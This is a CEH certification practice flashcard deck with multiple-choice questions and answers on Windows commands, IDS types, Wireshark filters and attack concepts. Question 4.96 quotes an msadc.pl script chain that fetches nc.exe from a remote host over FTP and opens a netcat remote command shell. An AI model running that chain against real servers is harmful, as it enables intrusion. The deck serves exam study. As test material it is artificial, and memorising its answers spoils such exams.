Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

CEH Practice Exam from Marcus > Day 4 76-114 > Flashcards

Day 4 76-114 Flashcards

1
Q

4.76 Which command would launch the Computer Management console on a Windows computer? A. gpedit B. ncpa.cpl C. services.msc D. compmgmt.msc

A

D. compmgmt.msc Try running compmgmt.msc from your command prompt! (on a Windows machine, of course)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

4.77 Which Windows command lists all the shares you have access to? A. NET CONFIG B. NET VIEW C. NET USE D. NET FILE

A

B. NET VIEW Again, try running this command from a Windows machine! If nothing shows up, then you don’t have access to any shares at the moment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

4.78 When you return to your desk after a lunch break, you notice a strange email in your inbox. The sender is someone you did business with recently, but the subject line has strange characters in it. What should you do? A. Delete the email and pretend nothing happened B. Reply to the sender and ask them for more information about the message contents C. Forward the message to your supervisor and ask for his opinion on how to handle it D. Forward the message to your security response team and delete the message from your computer

A

D. Forward the message to your security response team and delete the message from your computer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

4.79 You want to ensure your machines are compliant with the security policy. Which type of tool would you most likely use? A. Port scanner B. Vulnerability scanner C. Protocol analyzer D. Intrusion Detection System

A

B. Vulnerability scanner Both the port scanner and the vulnerability scanner will show you which ports are open. The vuln scanner, however, will show you much more, including which user accounts have weak or missing passwords, which patches are missing, which machines have old or outdated antivirus signatures, and a variety of other weaknesses.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

4.80 Which protocol is specifically designed to send event messages? A. SMS B. Syslog C. SNMP D. ICMP

A

B. Syslog

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

4.81 Which command-line utility lets you scan through text files and finds the regular expressions you define? In other words, which lets you do a “search” for “key-words” in text files? A. Notepad B. Grep C. MS Excel D. Relational database

A

B. Grep

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

4.82 You have two machines. Snort is installed on 192.168.0.99. The next machine is a Syslog server with the IP 192.168.0.150. You do a syn scan on the network, but the Syslog server isn’t getting the alert message from snort. You run Wireshark to see if the messages are being sent to the Syslog server. Which Wireshark filter will show the messages from the snort machine to the Syslog machine? A. tcp.srcport==514 && ip.src==192.168.0.99 B. Tcp.srcport==514 && ip.src==192.168.150 C. Tcp.dstport==514 && ip.dst==192.168.0.0/16 D. Tcp.dstport==514 && ip.dst==192.168.0.150

A

D. Tcp.dstport==514 && ip.dst==192.168.0.150

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

4.83 A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of the files is a tarball, two are shell script files, and the third is a binary file is named “nc.” The FTP server’s access logs show that the anonymous user account logged in to the server, uploaded the files, and extracted the contents of the tarball and ran the script using a function provided by the FTP server’s software. The ps command shows that the nc file is running as process, and the netstat command shows the nc process is listening on a network port. What kind of vulnerability must be present to make this remote attack possible? A. Directory traversal B. Brute force login C. File system permissions D. Privilege escalation

A

D. Privilege escalation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

4.84 From your computer you try to ping a server on the network. You know it’s up and running, but you don’t get any response from your ping attempts. Why could this be? A. The ARP is disabled on the target server B. ICMP could be disabled on the target server C. TCP/IP doesn’t support ICMP D. You need to run the ping command with root privileges

A

B. ICMP could be disabled on the target server

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

4.85 Which could help determine the attack surface of your company? A. Running a network scan to detect network services in the corporate DMZ B. Using configuration management to determine when and where to apply security patches C. Reviewing the need for a security clearance for each employee D. Training employees on the security policy regarding social engineering

A

A. Running a network scan to detect network services in the corporate DMZ

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

4.86 Your IDS captured some traffic that is possibly malicious. Which type of tool can help you determine if it really was malicious, or if it was just a false positive? A. Vulnerability scanner B. Network sniffer C. Intrusion Prevention System D. Protocol analyzer

A

D. Protocol analyzer

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

4.87 After doing a pen-test, you need to restore systems to a pre-test state. Which of these would NOT be included in this end-step? I. Removing all files uploaded on the system II. Cleaning all registry entries III. Mapping of network state IV. Removing all tools and maintaining backdoor for reporting A. III B. IV C. III and IV D. All should be included

A

B. IV

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

4.88 During an audit of IT processes, you find that there are no documented security procedures. What should you do in this event? A. Terminate the audit B. Create a procedures document C. Conduct compliance testing D. Identify and evaluate existing practices

A

D. Identify and evaluate existing practices

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

4.89 Which of the following is an extremely common IDS evasion technique in the web world? A. Spyware B. Port knocking C. Unicode characters D. Subnetting

A

C. Unicode characters Unicode is an international encoding standard for use with different languages and scripts, by which each letter, digit, or symbol is assigned a unique numeric value that applies across different platforms and programs. An IDS can be evaded by obfuscating or encoding the attack payload in a way that the target computer will reverse but the IDS will not. An adversary using the Unicode character could encode attack packets that an IDS would not recognize but that an IIS web server would decode and become attacked.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

4.90 Which tool could be used for passive operating-system fingerprinting? A. nmap B. ping C. tcpdump D. tracert

A

C. tcpdump While nmap can certainly do OS fingerprinting, it is considered active because you send traffic to the target. Tcpdump, on the other hand, is a sniffer, and by observing differences in the traffic you capture, you can determine the OS that sent the traffic. Tcpdump is passive as it does not send traffic to the target.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

4.91 Which type of tool would allow you to monitor all network traffic for malicious behavior, and send you an alert when it finds some? A. Firewall B. Proxy C. Network-based IDS D. Host-based IDS

A

C. Network-based IDS

17
Q

4.92 A large and well-organized hacking group will discover vulnerabilities but keep them quiet and hold on to them for later use. If one of these groups was to exploit and utilize several different vulnerabilities against you at once, what would this be considered? A. no-day B. Zero-sum C. Zero-day D. Zero-hour

A

C. Zero-day A Zero-Day attack exploits a previously unknown vulnerability.

18
Q

4.93 A covert channel is a channel that.. A. Transfers information over or within a computer system or network that is outside of the security policy B. Transfers information over or within a computer system or network that is encrypted C. Transfers information via a communication path within a computer system or network for transfer of data D. Transfers information over or within a computer system or network that is within the security policy

A

A. Transfers information over or within a computer system or network that is outside of the security policy

19
Q

4.94 You’ve successfully gained root access to a remote server. What is the first thing you should do so that you continue to maintain access to this server? A. Create a user account B. Download and install Netcat C. Disable IPTables D. Disable Key Services

A

A. Create a user account

20
Q

4.95 Which of these is a proxy tool that will let you intercept, test, and analyze your own web traffic in order to help you find vulnerabilities in web apps? A. Proxychains B. Dimitry C. Maskgen D. Burpsuite

A

D. Burpsuite Burp Suite is a Java application that can be used to secure or penetrate web applications. The suite consists of different tools, such as a proxy server, a web spider, intruder and repeater.

21
Q

4.96 A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester comes across a perl script that runs the following msadc functions: system(“perl msadc.pl -h $host -c "echo open $your >testfile"”); system(“perl msadc.pl -h $host -c "echo $pass»testfile"”); system(“perl msadc.pl -h $host -c "echo bin»testfile"”); system(“perl msadc.pl -h $host -c "echo get nc.exe»testfile"”); system(“perl msadc.pl -h $host -c "echo get hacked.html»testfile"”); system(“perl msadc.pl -h $host -c "echo quit»testfile"”); system(“perl msadc.pl -h $host -c "ftp -s: testfile"”); $0=; print “Opening”. \n”; system(“perl msadc.pl -h $host -c "nc -I -p $port -e cmd.exe"”); Which exploit is indicated by this script? A. A buffer overflow exploit B. A chained exploit C. A SQL injection exploit D. A denial of service exploit

A

B. A chained exploit

22
Q

4.97 You implement a blacklist for known-malicious IP addresses out on the internet. Immediately after this you get an alert that one or your PC’s is connected to one of these blacklisted IP’s that is a known C2 (command-and-control) server. You now need to get a rough idea of how severe this situation is, so which of these should you analyze? A. The IDS log B. Event logs on the Domain Controller (DC) C. Internet Firewall/Proxy log D. Event logs on the PC

A

D. Event logs on the PC The IDS only started logging these packets when you implemented the blacklist, so that won’t be enough info. To find out things like which program/process is causing this traffic, when it was installed, etc, you should look at the event logs on the PC itself.

23
Q

4.98 You’re experiencing slow network traffic, so you’ve decided to start monitoring all internet traffic. Legally speaking, what could cause a problem here? A. Not informing the employees that they are going to be monitored could be an invasion of privacy. B. The network could still experience traffic slowdowns. C. You would be telling employees who the boss is. D. All of the employees would stop normal work activities.

A

A. Not informing the employees that they are going to be monitored could be an invasion of privacy.

24
Q

4.99 Your company has many private IP’s and a range of public IP’s. Mary in the IT department monitors network traffic and finds that a large number of both IP ranges are sending traffic to a single IP address on the internet that is blacklisted. It turns out that these company machines have been compromised. Which type of attack is taking place here? A. Advanced Persistent Threat B. Rootkit attack C. Botnet attack D. Spear Phishing attack

A

C. Botnet attack

25
Q

4.100 Which command will launch the Computer Management console on a Windows machine? A. gpedit B. compmgmt.msc C. ncpa.cpl D. services.msc

A

B. compmgmt.msc If you’re not familiar with the Computer Management tool, try running the command in answer B to get an idea of what features it offers you.

26
Q

4.101 Which type of Intrusion Detection System should be used to observe network segments in large environments? A. Host-based Intrusion Detection System (HIDS) B. Firewall C. Honeypot D. Network-based Intrusion Detection System (NIDS)

A

D. Network-based Intrusion Detection System (NIDS)

27
Q

4.102 Your development team just created a new web application for customers that needs three different servers to operate: a web server, and application server, and a database server. Where should you place these servers? A. All 3 servers should be placed internally. B. All three servers should face the internet so they can communicate between themselves. C. The web and database server facing the internet, and the app server on the internal network. D. The web server facing the internet, and the application and database servers on the internal network.

A

D. The web server facing the internet, and the application and database servers on the internal network. Only the web server should be accessible from the internet. From there the server itself can access the internal app & DB servers, but no direct contact should be allowed from internet customers to the app & DB servers.

28
Q

4.103 After gaining control to a user account, how can you gain access to another user account’s confidential files and data? A. Port scanning B. Hacking Active Directory C. Shoulder-surfing D. Privilege Escalation

A

D. Privilege Escalation Once you gain access to a user account, a successful privilege escalation attack could allow you to gain the rights of another user or admin.

29
Q
  1. 104 Which type of IDS would be best suited to meet these requirements?
    - Monitors system activities
    - Verifies success or failure of an attack
    - Detects attacks that a network based IDS fails to detect
    - Near real time detection and response
    - Does not require additional hardware
    - Lower entry cost

A. Network based IDS

B. Open source based IDS

C. Host based IDS

D. Gateway based IDS

A

C. Host based IDS

30
Q

4.105 Frank from accounting sends you a an e-mail threatening you if you don’t “keep your mouth shut” over something you witnessed earlier. You report Frank to HR but he denies having sent that e-mail. What can you use to prove the e-mail did come from Frank? A. Confidentiality B. Integrity C. Authentication D. Non-Repudiation

A

D. Non-Repudiation

31
Q

4.106 To help explain the difference between a signature-based IDS and an Anomaly-based IDS, you could say that the Anomaly-based IDS can.. A. Identify unknown attacks B. Cannot deal with encrypted network traffic C. Requires vendor updates for new threats D. Produces less false positives

A

A. Identify unknown attacks

32
Q

4.107 What’s the best defense against ransomware that encrypts your files? A. Pay the ransom B. Analyze the ransomware to get the decryption key of encrypted data C. Keep some generation of off-line backup D. Use multiple antivirus software programs

A

C. Keep some generation of off-line backup

33
Q

4.108 Review this log file and name the type of activity that was logged:

Time: Oct 20 12:15:21 Port:20 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:23 Port:21 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:26 Port:22 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:29 Port:23 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:31 Port:25 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:33 Port:53 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

Time: Oct 20 12:15:35 Port:80 Source: 10.10.0.30 Destination: 10.10.0.12 Protocol:TCP

A. Teardrop attack targeting 10.10.0.12

B. Denial-of-Service attack targeting 10.10.0.30

C. Port scan targeting 10.10.0.30

D. Port scan targeting 10.10.0.12

A

D. Port scan targeting 10.10.0.12

34
Q

4.109 Which is a command-line based packet sniffer?

A. Nessus

B. Ethereal

C. TCPDump

D. Jack the Ripper

A

C. TCPDump

35
Q

4.110 In a Code Injection attack, the attacker.. A. gets the server to execute arbitrary code using a buffer overflow B. gains access to the codebase on the server and inserts new code C. inserts additional code into the javascript running in the browser D. inserts text into a data field that gets interpreted as code

A

D. inserts text into a data field that gets interpreted as code

36
Q

4.111 Which scanning technique splits the TCP header into multiple packets in an attempt to make it harder for packet filters to know the true purpose of the packet? A. SYN/FIN scanning using IP fragments B. IPID scanning C. ACK flag probe scanning D. ICMP Echo scanning

A

A. SYN/FIN scanning using IP fragments

37
Q

4.112 You visit a vendor’s site and they give you a tour of their facility. To access their data center, they must type a phrase using a keyboard. The system identifies individual employees by the way they actually type on the keyboard. After this, the user must also swipe their RFID badge. To open the data center, both identifications are required. What could you say about this method? A. Biological motion cannot be used to identify people. B. Although the approach has two phases, it actually implements just one authentication factor. C. The solution implements the two authentication factors: physical object and physical characteristic. D. The solution will have a high level of false positives

A

C. The solution implements the two authentication factors: physical object and physical characteristic.

38
Q

4.113 Examine this log file entry and pick the true statement:

June 15, 2017 2:15:45 PM 192.168.5.10 – 59888 192.168.6.130 – 22 tcp_ip

A. Application is SSH and 192.168.5.10 is the client and 192.168.6.130 is the server.

B. Application is SSH and 192.168.5.10 is the server and 192.168.6.130 is the client.

C. Application is Telnet and 192.168.5.10 is the client and 192.168.6.130 is the server.

D. SSH communications are encrypted and it’s impossible to know who is the client or the server.

A

A. Application is SSH and 192.168.5.10 is the client and 192.168.6.130 is the server.

39
Q

4.114 You want to capture Facebook website traffic in Wireshark. What display filter should you use that shows all TCP packets that contain the word ‘facebook’? A. display==facebook B. traffic.content==facebook C. tcp contains facebook D. list.display.facebook

A

C. tcp contains facebook

CEH Practice Exam from Marcus (15 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions